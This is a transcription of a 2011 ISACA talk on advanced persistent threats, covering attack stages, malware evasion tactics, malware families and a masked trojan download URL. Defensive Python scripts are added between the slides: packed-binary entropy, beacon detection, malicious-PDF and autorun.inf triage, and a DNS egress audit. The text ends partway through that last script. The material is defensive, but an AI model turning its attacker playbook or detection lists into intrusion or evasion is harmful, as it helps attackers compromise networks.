APT Hartford Oct12

Transcription

10/10/2011
Advanced Persistent Threat: The Battle to p0wn Your Network
ISACA Greater Hartford Chapter
October 12, 2011
Page 1 | YYYY MM DD | CONFIDENTIAL
Agenda
• What is advanced persistent threat?
• Goals of the attacker
• Stages of APT
• Why is it hard to catch them?
• Some examples – deconstructing the hack
• Lunch/Break
• Demonstrations
• What to look for?
• How can we protect ourselves?
Assumptions
• Any hack can be used to commit an APT-style attack – as long as it is stealthy enough
• As we only have the one day:
– Malware
– Web exploits - SQL injection
– Exploiting vulnerabilities in un-patched systems
– Browser-based exploits
Who am I?
• Team Lead (Vulnerability Management & Incident Response) with Bell Aliant:
– Penetration testing & application security assessments
– Vulnerability research
– Malware analysis
– Security Event Monitoring / Incident response
– Computer forensic investigations
• Worked as a Senior Manager for E&Y and KPMG in Security and Forensics
• Worked for the Canadian and US DoD as well as numerous utilities and .com companies
• Speak at numerous conferences (BlackHat, DefCon, ISACA, HTCIA, Interop, SANS, etc.)
Show of Hands…
• What is your role?
• What do you want to get out of this session?
• Do you believe your organization could be a target of APT?
• On a scale of 1-10, how well do you think your A/V solution is protecting you?
Getting Scary…
APT IN DEPTH
GENERAL TRENDS
“From Espionage to Sabotage”
(Enrique Salem – President/CEO, Symantec)
General Trends
• APT is becoming more public
• We continue to face challenges going forward
• We have to re-think our security models
• Unique malware continues to grow
• Government & law enforcement are “out gunned”
General Trends
• Motivations have changed
• The rise of “hacktivism”
– Hacking to make a political point
– Not just web site tampering
– Manipulating the computer and financial infrastructure of a target for political reasons is also a form of hacktivism
• The scary thing is that hackers are waging attacks for a very specific reason!
• Gone are the days of attacks based solely on the “coolness” factor or the trophy.
• There is lots of money to be had in hacking today!
According to….45 breach cases…
• Data breaches that were the result of malicious attacks and botnets were more costly and severe.
• Organizations are spending more on legal defense costs, which can be attributed to increasing fears of successful class actions resulting from customer, consumer or employee data loss.
• Average abnormal churn rates across all incidents in the study were slightly higher than last year (from 3.6 percent in 2008 to 3.7 percent in 2009), measured by the loss of customers who were directly affected by the data breach event.
2010 Ponemon Institute Survey / PGP Corporation
According to….45 breach cases…
• The most expensive data breach event included in this year's study cost a company nearly $31 million to resolve.
• The least expensive total cost of data breach for a company included in the study was $750,000.
2010 Ponemon Institute Survey / PGP Corporation
According to….531 respondents…
• Malware infection continued to be the most commonly seen attack, with 67.1 percent of respondents reporting it.
• Of the approximately half of respondents who experienced at least one security incident last year, fully 45.6 percent of them reported they’d been the subject of at least one targeted attack.
• Fewer respondents than ever are willing to share specific information about dollar losses they incurred
2010-11 CSI Survey
According to….531 respondents…
1. Basic attacks
– Phishing
– Simple port scans
– Brute force password scans
2. Malware
– Toolkits
– Attacks to un-patched systems
3. Attacks 2.0
– APT
– 21.6% of the 2.0 attacks were considered “targeted”
2010-11 CSI Survey
What are organizations doing?
According to…Verizon…
• 92% of breaches came from external sources
• Only 17% were internal
• 50% were due to a hack – and 49% incorporated malware
(chart) Compromised records by industry group
(chart) Breaches by industry group
2011 Verizon Breach Report
APT IN DEPTH
THE FACE OF CYBERCRIME
The Face of Cybercrime
Max Butler (aka Max Vision)
• 2nd offence after serving 5 yrs for CC theft
• Created Carders Market, an underground for brokering the sale of CCs and personal information
• Sentenced to 13 yrs and ordered to pay 27.5M in restitution
Albert Gonzalez
• Aka “soupnazi”, “segvec”
• Responsible for the TJX and Heartland CC thefts
• 170M CC numbers
• Previously was an IT contractor for the US Secret Service – ironically the same people who arrested him
• Longest US sentence – 20 yrs in Federal prison
Anonymous
• Inspired by the perceived anonymity under which users post images and comments on the Internet
• Been around since 2006, but most well known recently (2010-11) for:
– HB Gary Hack
– Operation Orlando (Universal Orlando Resort website defacement, airport + mayor website defacement)
– BofA document release (showing corruption)
– Operation Sony (PlayStation Network hack)
– Operation BART (Bay Area Rapid Transit hack)
Anonymous – Very Brazen….
• “Hacker Group Anonymous Aims To Destroy Facebook on Nov. 5. 2011”
– Due to their relationship with law enforcement
Anonymous… Operation Facebook
Lulzsec “LOLs-Sec”
• 6 core members (Sabu, Topiary, Kayla, T-Flow, Avunit, Pwnsauce)
• Does not appear to hack for financial profit
• Motivation is to have fun by causing mayhem
– “We do things just because we find it entertaining” and that watching the results can be “priceless”.
• As well as for “hacktivism” reasons
– When they hacked PBS, they stated they did so in retaliation for what they perceived as unfair treatment of Wikileaks in a Frontline documentary entitled WikiSecrets.
• They also claim to be drawing attention to computer security flaws and holes
– And they are doing a great job finding them – although they are normally pretty simple flaws (i.e. SQL injection)
• Called it “quits” after 50 days on June 25, 2011
Lulzsec – They mean what they say!
Scary….tried Bill O’Reilly’s site last week – still vulnerable!
Lulzsec…still around?
Lulzsec
• FOX X-Factor
• UK ATM
• Sony Japan
• PBS
• Infraguard
• Porn sites
• Senate.gov
• Gaming sites
Antisec Movement
• Made up of members from Anonymous and LulzSec as well as others
• Mission to expose the governments and their contractors through the “#AntiSec” movement
– Against security companies that use full-disclosure to profit and develop scare-tactics to convince people into buying their firewalls, anti-virus software and auditing services.
• Released 400MB of data from US government security contractor ManTech
• Much of the information appears to be related to projects that ManTech is involved in related to NATO and other security projects.
Organized Crime / Financial-led Campaigns
• Still a very common source of APT-type hacks
• The Russian Mafia made more money in online banking fraud last year than the drug cartels made selling cocaine
• An entire industry has cropped up over the years to support the theft of digital information with players in all aspects of the marketplace.
• Hackers who stole bank account details for 200,000 Citigroup customers infiltrated the company's system by exploiting a garden-variety security hole in the company's website for credit card users.
State Sponsored
• DigiNotar (2011)
– Apparently conducted by Iran
– Theory was the attack was "used to spy on Iranian Internet users on a large scale."
• Stuxnet (2010)
– US/Israel responsible for attack on Iran?
• Google / Operation Aurora (2010)
– Attempted theft of Gmail accounts by the Chinese (including those of senior US government officials, Chinese activists and others from S. Korea)
– Attacks from Jinan - home to one of six technical reconnaissance bureaus belonging to the People's Liberation Army and a technical college U.S. investigators last year linked to a previous attack on Google.
• International Monetary Fund (IMF) Hack (2011)
– Hacker installed software on a single computer that sent scam e-mails to specific victims
– The sophisticated nature of the attack and the resources required to execute it indicate a nation-state was involved
State Sponsored
• China’s Underground (NY Times – Majia Interview)
• “There are the intelligence-oriented hackers inside the People’s Liberation Army, as well as more shadowy groups that are believed to work with the state government.”
• “Computer hacking has become something of a national sport…There are hacker conferences, hacker training academies and magazines.”
State Sponsored
• “Microsoft and Adobe have a lot of zero days,” he said, while scanning Web sites at home. “But we don’t publish them. We want to save them so that some day we can use them.”
• When asked whether hackers work for the government, or the military, he says “yes.”
APT IN DEPTH
CYBERCRIME IS EVOLVING
Cybercrime is Evolving
• Vulnerability discoverers are the most important players, along with the SW/HW vendors introducing the vulnerabilities: no vulnerabilities, no hack, no breach.
• Eliminates 99% of the rest of the cybercrime world
Stuart McClure - McAfee
Cybercrime is Evolving
Stuart McClure - McAfee
Target Has Evolved
Different issues then!
Vehicles have changed
etc…
Rising Tide of Cyber Espionage
Wide Range of Victims
Browser Continues to be the Target
High Profile Attacks Increasingly Common
The Evolving Threat Landscape
• # of threats are up 5X
• Nature of threats changing
– From broad, scattershot to focused, targeted
– Pace of advanced attacks accelerating
• High profile attacks common place
– Citicorp, Sony, Epsilon, RSA, Adobe, Morgan Stanley, Lockheed, L-3, PBS, Google…
Hacktivism
• Wikipedia - “The nonviolent use of illegal or legally ambiguous digital tools in pursuit of political ends.”
• What should or should not be in the world…
• Many techniques used by hacktivists:
– Defacements
– Redirects
– DoS
– Data theft
– Web site parodies
Items that Have Caused our Demise…
• Too much reliance on Antivirus
• Social Networking + third party apps
• “Trusting” all our outbound traffic
• Sloppy perimeter security
• Specialized malware
• URL-shortening services = Phisher’s best friend
• BitTorrent
• Improved stealth Botnets
We’re Doomed…
2010-11 CSI Survey
The Malware Problem…
• Malware is difficult to deal with
• Exponential growth
• Lots are packed and encrypted – hard to automate or blacklist
• And therefore the medium of choice for attackers!
Malware Samples by Month
Steady increase month-to-month since start of 2010…
McAfee 2011 Q2 Threat Report
2011 Q2 – Total Malware Samples
Steady climb….22% increase over 2010
On track to 75M samples by EOY!
McAfee 2011 Q2 Threat Report
2011 Q2 – Unique Fake-Alert Samples
Steady growth again – malware of choice
McAfee 2011 Q2 Threat Report
2011 Q2 – Fake-AV Samples for Apple
Development of this malware due to the increase of Apple for business use.
iPad or iPhone malware is a case of “when” not “if”!
McAfee 2011 Q2 Threat Report
2011 Q2 – Evil URLs – Delivering Malware - Source
McAfee 2011 Q2 Threat Report
2011 Q2 – Evil URLs – Delivering Malware
McAfee 2011 Q2 Threat Report
How malware is bypassing security technology
• Target browser & plug-in vulnerabilities
• Zero-day exploits
• Obfuscated javascript
• Polymorphic payloads
• Frequently changing, dynamic domain names
• Encrypted communications
• Compromise legitimate Web sites
• Social Engineering
APT IN DEPTH
WHAT IS AN APT?
Introduction
• APT is really a “flashy term” vendors and the like are using to categorize attacks that I refer to as a “targeted attack”.
• Term coined by the USAF in 2006
• That is to say, as opposed to attacks that are considered “crimes of opportunity”, these attacks are very well thought out, based on a specific goal.
Introduction
• The use of the acronym APT:
– Advanced – The attacker is much more skilled, experienced, highly organized and usually funded when conducting an APT campaign.
– Persistent – These are not crimes of opportunity. Focus is on gaining long term control of an organization's network & data. Attackers maintain the level of interaction needed to execute their objectives (i.e. backdoors).
– Threat - The attacker is conducting this campaign based on a very specific goal – this is not like malware that has no real purpose (but to be annoying), they are after something specific (i.e. IP, access to your network, etc.)
Motive of the Attacker
• Political and/or military objective – Suppress government (i.e. “Hacktivism”)
• Economic objective – Stealing something of value – intellectual property
• Technical (i.e. contractors) objective – They need to hack you as part of a larger goal (i.e. RSA attack to get SecurID information, source code, etc.)
• Critical infrastructure such as power grid, water supply, telecom SCADA (i.e. Stuxnet)
What is an APT?
• Many make the mistake of thinking attacks are transient – that they come and go
• Attackers want to take advantage of economy of scale and break into as many places as possible, as quickly as possible.
• Therefore the tool of choice of an attacker is automation.
• Automation is not only what causes the persistent nature of the threat, but it is also what allows attackers to break in very quickly
What is an APT?
• Old school attacks were about giving the victim some visible indication of a compromise.
• Today it is all about not getting caught.
• Stealth and being covert are the main goals of today’s attacks.
• The goal of these attacks is to look as close — if not identical — to legitimate traffic. The difference is so minor that many security devices cannot differentiate between them
What is an APT?
• Attack’s goal is to provide some significant benefit to the attacker (i.e. economic, political, financial gain).
• Focus will be all about the data.
• Anything that has value to an organization means it will have value to an attacker.
• Data has become portable, and with the increasing popularity of cloud computing it is now available through the Internet.
What is an APT?
• Attackers do not just want to get in and leave, they want long term access.
• If someone is going to spend effort breaking in to an organization, they will make sure they can keep that access for a long period of time.
• Stealing data once has value, but stealing data for nine months gives the attacker even more payoff.
What is an APT?
• Advanced nations are under constant cyber attack. This is not a future threat, this is now. This has been going on for YEARS.
• Cyber “Cartels” are rapidly growing to surpass Drug Cartels in their impact on Global Security
– The scope of finance will surpass drug cartels
– The extent of the operation internationally
What is an APT?
What is an APT?
• MI5 says the Chinese government “represents one of the most significant espionage threats”
APT IN DEPTH
WHY IS IT SO HARD TO CATCH THEM?
Why is it hard to catch them?
• Hard to catch a moving target – we see attempts from different IPs and they change very frequently
• Inability to Detect “Low and Slow” Attacks – Non-predictable traffic patterns
• Hard to detect “bad” traffic when it is in plain sight – HTTP, HTTPS
Why is it hard to catch them?
• Organizations have such a large footprint infrastructure wise that they cannot secure and keep secure every last area
• Weak web application security
• Lack of monitoring controls – people don’t know data is missing (until it is up on “pastebin”)
• Blocking against zero day
• Lack of education in organizations – Spear phishing
Zero-day threats
• 4 times more zero day threats than in 2010
• Vulnerabilities in systems and applications that the vendor is unaware of
• They do exist, and someone out there knows about them
• Used in APTs to breach organizations’ networks that are otherwise very secure
APT IN DEPTH
ANATOMY OF AN APT
Step 1 - Reconnaissance
• Attackers will watch and take notes on who in an organization they need to target, from administrative assistants to executives.
• Much of this information is gleaned from public Web sites, DNS recon, etc.
• Map org chart (Identify attack targets)
• Social reconnaissance (acquire email, IM, etc.)
• Recruit, blackmail insiders
Step 2 – Initial Breach
• They will use spear-phishing attacks to send those identified targets an attachment with an exploit that can be used to hijack the target's system (malicious PDF, DOC, etc. w/shellcode)
• Any personal information the attacker knows about the source will be used to entice the target user to open the attachment.
• Candy drops around the building (Thumb drives, DVD’s)
• Gain physical access (impersonate cleaning crew, etc.)
Step 3 – Establish Covert Backdoor
• Gain elevated user privileges
• Laterally move within network & establish backdoors
• Inject additional Malware
• Install rootkits, RATs, etc.
Step 4 – Establish C&C Infrastructure
• Grab credentials and use these to log on to end point systems, and siphon data.
• Now the network is being peppered with backdoors, tools to grab passwords, steal emails, and footprint the network
• Establish encrypted SSL tunnel – Covert channel
Step 5 – Complete Objectives/Exfiltrate
• Ex-filtrate Intellectual Property, Trade Secrets data
• Imagine anything from financial data, marketing plans, research and development information - and transferring that information to an external server under the attackers' control
• Install Trojans in source code
• Control critical systems
Step 6 – Maintain Persistence
• Revamp Malware to avoid detection
• Utilize other attack methods to maintain presence
• Continue monitoring networks, users, data
Step 7 – Public Distribution (optional)
Anatomy of an APT
MALWARE, BOTNETS AND RATS…OH MY!
Malware Goal
• All Malware basically does the same stuff
– Compromise a machine undetected
– Gain complete control
– Identify & acquire “target” information
– Attempt ex-filtration of information
– Remain undetected - until target info is acquired + as long as possible
Infection Lifecycle of a Typical Botnet
Malware Facts….
• APT Malware:
– Average File Size: 121.85 KB
• Most Common APT Filenames:
– svchost.exe (most common)
– iexplore.exe
– iprinp.dll
– wiinzf32.dll
• APT Malware avoids anomaly detection through:
– Outbound HTTP connections
– Process injection
– Service persistence
• APT Malware Communication:
– 100% of APT backdoors made only outbound connections
– 83% used TCP port 80 or 443
– 17% used another port
Malware Evasion Tactics
• Common techniques:
– Compression
– Obfuscation
– Polymorphism
– Internal encryption
– Stealth tactics
– Dynamic memory residence
– Armoring
– Anti-code debuggers
– Kernel alterations
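The slides list compression and internal encryption as the first two evasion tactics, and earlier note that packed and encrypted samples are hard to automate or blacklist. One cheap triage check a responder can still run on such a sample is per-section Shannon entropy: compressed or encrypted data approaches 8 bits per byte, while plain code and strings sit well below that. The script below is an added example, not part of the deck; the section contents are constructed stand-ins (no real binary is parsed) and the 7.0 bits/byte cut-off is a rule-of-thumb assumption, not a figure from the slides.

```python
import math
import random
from collections import Counter
from typing import Dict, List

# Packed or encrypted sections approach 8 bits of entropy per byte; plain x86
# code and ASCII strings sit well below that. The 7.0 cut-off is a common
# rule of thumb chosen for this example, not a figure from the slides.
PACKED_THRESHOLD = 7.0


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte of data (0.0 for empty input)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def section_entropies(sections: Dict[str, bytes]) -> Dict[str, float]:
    """Entropy per named section, rounded for reporting."""
    return {name: round(shannon_entropy(body), 2) for name, body in sections.items()}


def looks_packed(sections: Dict[str, bytes], threshold: float = PACKED_THRESHOLD) -> List[str]:
    """Names of sections whose entropy is at or above the threshold."""
    return [name for name, body in sections.items() if shannon_entropy(body) >= threshold]


def constructed_sections() -> Dict[str, bytes]:
    """Constructed stand-ins for PE sections; no real binary is read."""
    rng = random.Random(1234)  # fixed seed so the run is reproducible
    # Repeating prologue-like bytes: low entropy, as ordinary code sections tend to be
    code = bytes([0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x10, 0x53, 0x56, 0x57] * 300)
    strings = b"This program cannot be run in DOS mode.\r\n" * 50
    # Uniformly random bytes mimic the look of a packed or encrypted section
    packed = bytes(rng.getrandbits(8) for _ in range(4096))
    return {".text": code, ".rdata": strings, "UPX1": packed}


if __name__ == "__main__":
    secs = constructed_sections()
    print(section_entropies(secs))
    print("likely packed/encrypted:", looks_packed(secs))
```

High entropy alone is not proof of malice (signed installers and media resources score high too), so treat a hit as a reason to unpack and look further, not as a verdict.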
Defining Advanced Malware
• We can see the evolution
• Next generation of threats
– Unknown
– Targeted
– Polymorphic
– Dynamic
– Personalized
• Leverage zero-day vulnerabilities, commercial quality toolkits, social engineering tactics
• Often targets IP, credentials or other networked assets
Conventional vs. Modern, APT Malware
• Conventional Malware
– Characterized by using “spreading” techniques, custom C&C transport protocols, IRC communication
– Examples: Malware/worms such as Conficker, Blaster, Slammer, Mega-D, IRC bots
– Detectable through a variety of technologies/tactics: NetWitness/Solera, EnVision/Arcsight/Splunk, NIDS
– Port scanning, high windows port activity, non-http over port 80, non-web traffic, etc.
Conventional vs. Modern, APT Malware
• Modern-ish malware
– Characterized by infecting via browser based exploits
– Exploit Channel: PDF, Flash, IE/FireFox, QuickTime, C&C
– Callback over HTTP(s)
– Malware: ZeuS, Gozi, Koobface, Rustock, Spyeye
– Partially detectable through manual traffic analysis fairly easily, but a full time resource is needed
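The two slides above give two different detection handles: conventional malware shows up as non-HTTP traffic over port 80, while the Malware Facts slide says APT backdoors make only outbound connections, mostly on 80/443, so they look like browsing and need traffic analysis to spot. The script below is an added example, not from the deck or any vendor tool, that implements both checks over a constructed flow log: a protocol check for port-80 flows whose first bytes are not an HTTP request line, and a beaconing check that flags source/destination pairs whose connection intervals are far more regular than human browsing. The flow records, the minimum event count and the coefficient-of-variation threshold are assumptions made for the example.

```python
from collections import defaultdict
from statistics import mean, pstdev
from typing import List, Tuple

# Constructed flow log: (epoch seconds, src, dst, dst port, first bytes of payload).
# 10.0.0.5 calls back every ~5 minutes; 10.0.0.7 speaks IRC on port 80; 10.0.0.9 browses normally.
Flow = Tuple[int, str, str, int, bytes]
FLOWS: List[Flow] = [
    (1000, "10.0.0.5", "203.0.113.9", 80, b"GET /index.php?id=1 HTTP/1.1"),
    (1301, "10.0.0.5", "203.0.113.9", 80, b"GET /index.php?id=1 HTTP/1.1"),
    (1599, "10.0.0.5", "203.0.113.9", 80, b"GET /index.php?id=1 HTTP/1.1"),
    (1900, "10.0.0.5", "203.0.113.9", 80, b"GET /index.php?id=1 HTTP/1.1"),
    (2200, "10.0.0.5", "203.0.113.9", 80, b"GET /index.php?id=1 HTTP/1.1"),
    (1050, "10.0.0.7", "198.51.100.4", 80, b"NICK bot1234\r\nUSER bot 0 * :bot"),
    (1010, "10.0.0.9", "192.0.2.10", 80, b"GET / HTTP/1.1"),
    (1075, "10.0.0.9", "192.0.2.10", 80, b"GET /news HTTP/1.1"),
    (1900, "10.0.0.9", "192.0.2.10", 80, b"POST /login HTTP/1.1"),
    (2050, "10.0.0.9", "192.0.2.10", 80, b"GET /img.png HTTP/1.1"),
]

HTTP_METHODS = (b"GET ", b"POST ", b"HEAD ", b"PUT ", b"OPTIONS ", b"CONNECT ", b"DELETE ")


def non_http_on_80(flows: List[Flow]) -> List[Tuple[str, str]]:
    """Port-80 flows whose payload does not start like an HTTP request (the 'conventional' tell)."""
    return [(src, dst) for _, src, dst, dport, payload in flows
            if dport == 80 and not payload.startswith(HTTP_METHODS)]


def beacon_candidates(flows: List[Flow], min_events: int = 4, max_cv: float = 0.1):
    """(src, dst) pairs whose inter-connection gaps are suspiciously regular.

    CV = stdev / mean of the gaps. A sleep()-driven callback loop has a CV near 0;
    a person clicking around does not. Both thresholds are assumptions for the example.
    Returns (pair, mean gap in seconds, cv) for each hit.
    """
    times = defaultdict(list)
    for ts, src, dst, _, _ in flows:
        times[(src, dst)].append(ts)
    hits = []
    for pair, ts in times.items():
        if len(ts) < min_events:
            continue  # too few events to say anything about regularity
        ts.sort()
        gaps = [b - a for a, b in zip(ts, ts[1:])]
        m = mean(gaps)
        cv = pstdev(gaps) / m if m else float("inf")
        if cv <= max_cv:
            hits.append((pair, round(m), round(cv, 3)))
    return hits


if __name__ == "__main__":
    print("non-HTTP on 80:", non_http_on_80(FLOWS))
    print("beacon candidates:", beacon_candidates(FLOWS))
```

On real data, run the beacon check per day against proxy or NetFlow exports and whitelist known pollers (update agents, monitoring) first, otherwise they dominate the results.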
Collapse of Current Technologies
• AV (Symantec, McAfee, Trend) bypassed by
– Dynamic zero-day malware
– Targeted attacks
– Polymorphic malware
• URL Filtering (Cisco, Blue Coat, WebSense) bypassed by
– Dynamic domain names & URLs
– Compromised legitimate Web Sites
– Spear Phishing with embedded URL’s
• IPS (Cisco, McAfee, TippingPoint, SourceFire) bypassed
– Signatures for reactive threats
– Heuristics are too noisy - high FP/FN rate
– Can’t stop Targeted Malware
What About AV?
“Even after 30 days, many AV vendors cannot detect known attacks, making it critical for enterprises to take a more proactive approach to online security in order to minimize the potential for infection,” - Panos Anastassiadis (COO, Cyveillance)
Malware Can Defeat Sophisticated Defenses - Encryption
• Just because your laptops and critical data may be encrypted doesn’t mean your enterprise is more secure than before
– If you can access your laptop’s encrypted data, then that means…
– …so too can a Trojan Horse which borrows your Windows logon credentials
• Trojans enable knowledgeable hackers to bypass both strong encryption and sophisticated defenses alike in order to steal sensitive data.
New Direction for Malware
• Malicious code used in APT attacks is usually:
– Not “sexy” – the simple techniques work well!
– To some extent, custom
• Not widely disseminated = not picked up by AV
• Not necessarily custom code but custom “packaging”
– Highly targeted
• Mostly a factor of the delivery mechanism, spearphishing email, web link, etc.
– Modular
• Monolithic binary is risky; reveals too much about the MO, capabilities of the attacker
Modular….what’s That?
• Historically your neighborhood script kiddie had one of two choices for his exploitation tools:
– The Unix way: a lot of tools, each one does a certain function very, very well
– The Microsoft Word way: one tool to rule them all, contains all the functionality plus the kitchen sink
• However both of these techniques have drawbacks
– The Unix way inevitably leads to tools that have vastly different interfaces, difficult learning curve
– The Word way helps ensure a consistent interface but exposes all of your capabilities at once to the malware analyst
Modular Implants vs. Memory Analysis
• These modular implants pose a significant challenge to the incident responder
– No longer is the entire binary (or binaries) available for viewing and analysis from the disk
– Now we must fuse together the results of traditional malware analysis with the volatile data acquisition
• Malware authors will continue to improve in this arena
– Freeing unused memory as soon as it is no longer necessary
– Zeroing out sensitive memory areas after use
• Will need more research and development to keep pace with the malicious code authors!
APT IN DEPTH
FORMS OF MALWARE
Rogueware
• Rogue security software (i.e. FakeAV)
• 35M computers infected every month with a form of rogueware
• Many victims pay for these programs, $50-$70, and stats show how bad guys are making upwards of $34M a month with this scam
• Many are fake anti-virus scanners
Rogueware
Twitter / Facebook
• Koobface – Links to malicious websites in Twitter & FB
• Linked to sites that would install malware
• I.e. - Message to view a video – Flash Player update needed = Malware
The Risks: Koobface in Action
The Risks: Koobface in Action
Less than 10 minutes later!
Movie Anyone?
• Torrent download
• Need a codec
• Download the codec, and your machine is infected
• Your .rar archive is password protected, go to this link for the password.
Adobe Zero Day
• Exploits in Flash, Acrobat = Cross platform
• Open a PDF that has bad shellcode in it with a vulnerable version of Reader
• Forced to release out-of-band patches
• 2010 McAfee Labs counted 214,992 pieces of malware aimed at vulnerabilities in Adobe Acrobat and Reader.
• In contrast, only 2,227 malware attacked vulnerabilities in Microsoft Office products.
• Still lots of organizations with old versions out there
Adobe Zero Day
• Example - TROJ_PIDIEF.WX (CVE-2009-0927)
– The PDF document contains heavily encrypted java script which has a malicious shellcode.
– Downloads a malicious file from the site http://xxxx.com/geed/geed.exe
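The TROJ_PIDIEF example above is typical of the malicious-PDF family the slide describes: the JavaScript is tucked inside an encoded stream, and the name tokens that reference it can be spelled with hex escapes (`/J#53` for `/JS`) so a naive string search misses them. The triage script below is an added example, not from the deck or any product; it inflates `/FlateDecode` streams, folds name escapes, and counts the risky tokens a responder would want to see before opening a sample in a sandbox. The PDF it scans is constructed inline (a catalog with an escaped `/OpenAction` pointing at a compressed JavaScript action); the token list is a starting point chosen for the example, not a complete set.

```python
import re
import zlib
from typing import Dict

# Name tokens worth a closer look. Assumption: a triage starting point, not an exhaustive list.
RISKY_NAMES = (b"/JavaScript", b"/JS", b"/OpenAction", b"/AA",
               b"/Launch", b"/EmbeddedFile", b"/RichMedia")

NAME_ESCAPE = re.compile(rb"#([0-9A-Fa-f]{2})")
# A non-nested stream dictionary followed by its stream body.
STREAM_RE = re.compile(rb"<<((?:(?!<<|>>).)*)>>\s*stream\r?\n(.*?)\r?\nendstream", re.S)


def fold_name_escapes(data: bytes) -> bytes:
    """PDF allows /JS to be written as /J#53; fold such escapes so keyword matching holds."""
    return NAME_ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), data)


def inflate_flate_streams(data: bytes) -> bytes:
    """Return the raw file plus the inflated body of every /FlateDecode stream found."""
    extra = []
    for m in STREAM_RE.finditer(data):
        if b"/FlateDecode" in fold_name_escapes(m.group(1)):
            try:
                extra.append(zlib.decompress(m.group(2)))
            except zlib.error:
                pass  # corrupt or differently-encoded stream: leave it for deeper tooling
    return data + b"\n" + b"\n".join(extra)


def triage_pdf(data: bytes) -> Dict[str, int]:
    """Count risky name tokens after inflating streams and folding escapes."""
    view = fold_name_escapes(inflate_flate_streams(data))
    return {n.decode(): len(re.findall(re.escape(n) + rb"(?![A-Za-z])", view))
            for n in RISKY_NAMES}


def is_suspicious(data: bytes) -> bool:
    return any(triage_pdf(data).values())


def constructed_sample() -> bytes:
    """Constructed PDF: escaped /OpenAction plus a JavaScript action hidden in a Flate stream."""
    hidden = b"<< /Type /Action /S /JavaScript /JS (app.alert(1)) >>"
    body = zlib.compress(hidden)
    return (b"%PDF-1.4\n"
            b"1 0 obj << /Type /Catalog /Pages 2 0 R /Open#41ction 4 0 R >> endobj\n"
            b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
            b"3 0 obj << /Type /Page /Parent 2 0 R >> endobj\n"
            b"4 0 obj << /Length " + str(len(body)).encode() + b" /Filter /FlateDecode >>\nstream\n"
            + body + b"\nendstream\nendobj\n%%EOF\n")


BENIGN_SAMPLE = b"%PDF-1.4\n1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n%%EOF\n"

if __name__ == "__main__":
    print(triage_pdf(constructed_sample()))
    print("suspicious:", is_suspicious(constructed_sample()), is_suspicious(BENIGN_SAMPLE))
```

Other filters (`/ASCIIHexDecode`, `/LZWDecode`, object streams) and encrypted documents are not handled here; a sample that uses them and still scores zero should be treated as unknown rather than clean.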
Adobe Zero Day
• “I have deployed a newer version…no problem!”
– End user grabs a copy of Adobe Acrobat (only licensed version I have is v7.0) or user installs scanner software package…
– End user installs this – old version of reader installed along with writer
AutoRun (USB)
• Made popular by Conficker
• Use of autorun.inf to change the options
• Attackers manipulate the options in the popup
• Better with Windows 7
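The AutoRun slide says the trick is an autorun.inf that changes what the AutoPlay popup offers, so a defender checking removable media wants a parser that pulls out the directives which launch code and spots option text dressed up to look like Windows' own "Open folder to view files" entry. The script below is an added example, not from the deck; it hand-parses the INI-style file (tolerating the junk lines that padded real-world samples) and the two autorun.inf contents it checks are constructed, with a placeholder executable name.

```python
from typing import Dict, List

# Constructed autorun.inf contents. The executable path is a placeholder, not a real sample.
BENIGN_AUTORUN = """[autorun]
icon=setup.ico
label=Vendor Driver Disc
"""

SUSPICIOUS_AUTORUN = """[autorun]
open=files\\update.exe
icon=%SystemRoot%\\system32\\SHELL32.dll,4
action=Open folder to view files
shell\\open\\command=files\\update.exe
useautoplay=1
;xkQ7zp  <- filler line with no '=' of the kind seen padding real samples
"""


def parse_autorun(text: str) -> Dict[str, str]:
    """Return key=value pairs from the [autorun] section, keys lower-cased.

    Deliberately forgiving: lines without '=' are skipped rather than rejected,
    because some samples interleave junk to upset stricter INI parsers.
    """
    entries: Dict[str, str] = {}
    in_section = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].strip().lower() == "autorun"
            continue
        if in_section and "=" in line:
            key, _, value = line.partition("=")
            entries[key.strip().lower()] = value.strip()
    return entries


def assess_autorun(text: str) -> List[str]:
    """Findings for directives that run code or masquerade as the built-in folder option."""
    entries = parse_autorun(text)
    findings: List[str] = []
    for key, value in entries.items():
        if key in ("open", "shellexecute"):
            findings.append(f"{key} launches {value!r}")
        elif key.startswith("shell\\") and key.endswith("\\command"):
            findings.append(f"shell verb {key} runs {value!r}")
        elif key == "shell":
            findings.append(f"default shell verb overridden to {value!r}")
    action = entries.get("action", "").lower()
    if findings and "open folder" in action:
        findings.append("action text imitates the built-in 'Open folder to view files' prompt")
    return findings


if __name__ == "__main__":
    for name, content in (("benign", BENIGN_AUTORUN), ("suspicious", SUSPICIOUS_AUTORUN)):
        print(name, assess_autorun(content) or ["no findings"])
```

On a live host the right fix is still to disable AutoRun for removable media by policy, as the slide's "Better with Windows 7" remark implies; the parser is for triaging media that has already been found.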
Password Stealing Trojans (i.e. Zeus)
• Targeted mostly financial organizations
• Big hit on BofA in 2010
• Keystroke monitoring trojan
Remote Access Tools (RATs)
• Poison Ivy, Nuclear RAT, etc.
• Provide Remote access to systems
• Remote registry, screen grab, keystroke log, CMD shell, shutdown, file viewer, etc.
DNS Hijack Malware
• Resets your DNS server settings
• Points you to an attacker’s DNS
• Resolves common sites (i.e. Google.com) to the attacker's address
• Download malware from there
• Lots of organizations do not block outbound DNS resolution
• Becoming popular with Apple products
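Two of the bullets above translate directly into checks: a hijacked host has resolver settings that are not the organization's, and it only works because the perimeter lets clients talk DNS to anything on the Internet. The script below is an added example, not from the deck; it audits a resolv.conf-style resolver list against an approved set and audits a firewall egress policy for rules that allow client subnets to send port-53 traffic anywhere other than the approved resolvers. The approved resolvers, client range, resolver file and rule set are all constructed for the example.

```python
import ipaddress
from typing import List, Tuple

# Constructed environment: the organization's approved internal resolvers and client range.
APPROVED_RESOLVERS = {"10.1.0.53", "10.1.1.53"}
CLIENT_NETS = [ipaddress.ip_network("10.0.0.0/8")]

# Constructed resolver file as a hijacked host might carry it: one good entry, one rogue.
RESOLV_CONF = "search corp.example\nnameserver 10.1.0.53\nnameserver 192.0.2.44\n"

# Constructed egress policy: (action, src cidr, dst cidr, proto, dst port).
Rule = Tuple[str, str, str, str, int]
RULES: List[Rule] = [
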